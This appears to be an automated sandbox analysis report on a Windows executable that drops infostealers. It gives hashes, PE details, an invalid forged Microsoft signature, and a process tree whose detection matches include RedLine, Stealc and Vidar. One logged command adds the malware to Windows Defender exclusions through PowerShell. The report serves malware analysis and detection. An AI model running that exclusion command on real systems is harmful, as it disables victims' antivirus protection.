                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                Entropy (8bit):4.465630519219252
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:vIXfpi67eLPU9skLmb0b4hWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSba:AXD94hWlLZMM6YFH1+a
                                                                                                                                                                                                                                MD5:F1C91B6D8D06D87D7A0A1594ED2E1BFF
                                                                                                                                                                                                                                SHA1:8BCE498E1D672008F00329C36B013A08AD39190F
                                                                                                                                                                                                                                SHA-256:4B3A959C58B2636BE6A46A99335A57038119C67F9ECA2BF431C8DF7EE696F40E
                                                                                                                                                                                                                                SHA-512:B5ADBD090ADBD265550F256929E13D1450AC1CBD78C1E051D26725F54F5754377DD2D1B21112DDB9CFC9AAC349A33FEC47C033F32ECE3475E511C65A658CF6DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:regf6...5....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..%.gt................................................................................................................................................................................................................................................................................................................................................3.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1765376
                                                                                                                                                                                                                                Entropy (8bit):4.580689864272319
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:jIXfpi67eLPU9skLmb0b4hWSPDaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSba:0XD94hWSLZMM6YFH1+a
                                                                                                                                                                                                                                MD5:A92ACCE6960BC267D2E9B935641EB886
                                                                                                                                                                                                                                SHA1:291D08133D2BB53D2D15000EAEB91A377DB68473
                                                                                                                                                                                                                                SHA-256:4DC29D850B94D9664570648E7791E6AAAAAF46DD650CD2BBF6EC2B246B2094CC
                                                                                                                                                                                                                                SHA-512:D46B5B5E61DB00F2C8FFCB71255BF2D992CEE9987B1263F8D0F36FCA41297034BCA47FFBA4C10C22EABF63C4C344AA45DFC1D03104CE583A99E1F56464B7F50F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:regf5...5....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..%.gt................................................................................................................................................................................................................................................................................................................................................3.HvLE........5............nV.r......:>.......0...@......hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........b...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):6.189955402565391
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                File size:46'304 bytes
                                                                                                                                                                                                                                MD5:e533f92146fcacb8caca823882b8d304
                                                                                                                                                                                                                                SHA1:fcb2b79d08e2fb7a58142faf7db2a36f142b309d
                                                                                                                                                                                                                                SHA256:3cf0b82b4b91ac001ede7dfe7736f42e2a5e1bd9cc6da34393ec9e18ec81a9fe
                                                                                                                                                                                                                                SHA512:334b90d543b5835f88d3891c03fe78ac91c2569e47bfb11fbae58b9544fa569f411e4a2d8b57049a97f79afd51312eed57dd95c74b680331882ca77a46888c69
                                                                                                                                                                                                                                SSDEEP:768:ygDUz4vSd32TINlRjiniKEc3dJ3Bwj+3p5SNUMNTEFiRQ:zUz4Kd320N+nir2FMN9NeiS
                                                                                                                                                                                                                                TLSH:A2238E12737C573BCFEF4BB99860621016749362AB41CBAD2DD4A0DE54ABBC507223E7
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...I.B..........."...0.....&............ ....@...... ..............................t.....`................................

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x400000
                                                                                                                                                                                                                                Entrypoint Section:
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:

                                                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                • 12/03/2024 08:45:35 12/03/2025 08:45:35
                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                Thumbprint MD5:8C74F4D8F122C972E82664C720C5065F
                                                                                                                                                                                                                                Thumbprint SHA-1:7371AC4AF66383A466DB59FC20A43346F996B92B
                                                                                                                                                                                                                                Thumbprint SHA-256:B565713D3BB668C26490EEDB925608055875E63F795CD5DE1729162E08CACED2
                                                                                                                                                                                                                                Serial:291B0D8C1A1196488D44C77B32422497

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                pop edx
                                                                                                                                                                                                                                nop
                                                                                                                                                                                                                                add byte ptr [ebx], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax+eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x626.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x9c000x18e0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0c40x38.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x20000x919a0x920094bdd260b7fde5112c70dbd22d6bcb6eFalse0.5108090753424658data5.963722722119575IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0xc0000x6260x8007ccd95491660fbda3924dbe08f84df33False0.32421875data3.4778778318304995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_VERSION0xc0a00x39cdata0.38852813852813856
                                                                                                                                                                                                                                RT_MANIFEST0xc43c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:11:27:08
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                Imagebase:0x1f8171c0000
                                                                                                                                                                                                                                File size:46'304 bytes
                                                                                                                                                                                                                                MD5 hash:E533F92146FCACB8CACA823882B8D304
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:11:27:09
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                                                                                                                                                Imagebase:0xad0000
                                                                                                                                                                                                                                File size:42'064 bytes
                                                                                                                                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:11:27:27
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
                                                                                                                                                                                                                                Imagebase:0x7ff623430000
                                                                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:11:27:28
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
                                                                                                                                                                                                                                Imagebase:0x7ff623430000
                                                                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:11:27:32
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:11:27:32
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                File size:496'640 bytes
                                                                                                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:11:27:33
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:706'560 bytes
                                                                                                                                                                                                                                MD5 hash:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:11:27:35
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:11:27:35
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'075'202 bytes
                                                                                                                                                                                                                                MD5 hash:B0E9D3290621648878CA0D486C60F951
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2004294396.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:11:27:35
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:204'288 bytes
                                                                                                                                                                                                                                MD5 hash:220CB1B1688C2364B9AB272E37B896F3
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:11:27:38
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:11:27:39
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
